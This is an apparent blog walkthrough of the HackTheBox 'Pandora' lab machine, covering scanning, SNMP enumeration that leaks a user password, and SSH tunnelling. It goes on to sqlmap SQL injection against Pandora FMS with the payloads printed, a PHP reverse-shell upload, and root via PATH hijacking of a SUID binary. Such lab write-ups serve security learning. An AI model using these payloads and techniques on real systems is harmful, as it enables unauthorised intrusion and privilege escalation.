Posted onEdited onInHackTheBox walkthroughViews: Word count in article: 1.8kReading time ≈7 mins.
introduce
OS: Linux Difficulty: Easy Points: 20 Release: 08 Jan 2022 IP: 10.10.11.136
Enumeration
NMAP
1 2 3 4 5 6
┌──(root💀kali)-[~/hackthebox/machine/pandora] └─# nmap -sV -v -p- --min-rate=10000 10.10.11.136 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We see that the TCP ports 22(ssh) and 80(http) are open. Let’s check what the port 80 gives us.
Navigating the website, it seems like all are static pages and no dynamic content is being shown. There is one form for filling sending a message to admins, but the form does not do anything except refresh the page. There is also not a robots.txt that may reveal some juicy info. Maybe there are some interesting hidden directories, let’s fire gobuster!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
┌──(root💀kali)-[~/hackthebox/machine/pandora] └─# gobuster dir -u http://10.10.11.136 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.11.136 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/01/12 00:51:23 Starting gobuster in directory enumeration mode =============================================================== /assets (Status: 301) [Size: 313] [--> http://10.10.11.136/assets/]
Gobuster gives nothing interesting except, the /assets directory which contains javascript and css files and some images. Maybe this is the directory where it is fetching the contents on the main website from.
At this point we don’t have much to work with. Let’s try a UDP scan.
1 2 3
nmap -sU -sC -sV -v 10.10.11.136
Discovered open port 161/udp on 10.10.11.136
We got one port(UDP 161) SNMP. Let’s see what it has to offer. We run snmpwalk with the public community string.
public is default for most snmp servers and thats why I tried public first, if it doesn’t work, one might have to bruteforce the community string.
1 2 3 4
┌──(root💀kali)-[~/hackthebox/machine/pandora] └─# snmpwalk -v 2c 10.10.11.136 -c public | grep daniel iso.3.6.1.2.1.25.4.2.1.5.817 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'" iso.3.6.1.2.1.25.4.2.1.5.1119 = STRING: "-u daniel -p HotelBabylon23"
Snmpwalk gave us a bunch of details, but the most interesting one is the credentials of the user Daniel. Apparently there is a process running and the command of that includes the credentials for the user Daniel.
Let’s ssh into the box with the obtained credentials. The user “daniel” does not have a lot of privileges. Looking at /etc/passwd, there is one other user matt which might have privileges. Looking around the system, we see that along with the static website that we saw earlier, there is one another web app called pandora. But looking at the sites-enabled config, there seems to be no way to it. But making a curl request from the localhost(victim), shows something interesting.
It seems like only the localhost might have access to that website. Let’s create an ssh tunnel to port 80 so that we can view the website from our machine.
1
ssh -L 80:localhost:80 daniel@10.10.11.136
The pandora console opens and asks for credentials.
Common login credentials like admin/admin, admin/password don’t work. Googling pandora gives us the information that it is a monitoring system. Moreover the version of the pandora is clearly visible on the bottom of the login page: v7.0NG.742. On searching for the exploit specific to this version we come across a very interesting article.
┌──(root💀kali)-[~/hackthebox/machine/pandora] └─# sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump ...... sqlmap resumed the following injection point(s) from stored session: --- Parameter: session_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: session_id=-4214' OR 7546=7546# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: session_id=''' OR (SELECT 8036 FROM(SELECT COUNT(*),CONCAT(0x716b7a6a71,(SELECT (ELT(8036=8036,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HLHR
After logging in as admin, we snoop around a bit and see that there is a file upload options. It also seems like the system is written in php. So lets use the good old php-reverse-shell.
go to admin tools -> file manager
We upload the shell and set a listener at 9000 on our machine and navigate to the shell in our browser.
System information as of Wed 12 Jan 14:40:31 UTC 2022
System load: 0.14 Processes: 262 Usage of /: 63.0% of 4.87GB Users logged in: 2 Memory usage: 8% IPv4 address for eth0: 10.10.11.136 Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan 12 14:39:39 2022 from 10.10.17.32 matt@pandora:~$ id uid=1000(matt) gid=1000(matt) groups=1000(matt) matt@pandora:~$ whoami matt
After logging in, the first thing we do is obtain linpeas.sh onto the target system. Running linpeas gives some juicy info, but the most eye catching thing is a binary called pandora_backup with the SUID set.
Looking at the contents of the binary, we see that it is using tar to uncompress something from /root. Since tar is not being called with the absolute path, we can use PATH highjacking to obtain root.
We create a local file tar, with contents “/bin/sh”, append the path to our PATH env variable and run the binary and we get root and out last flag inside /root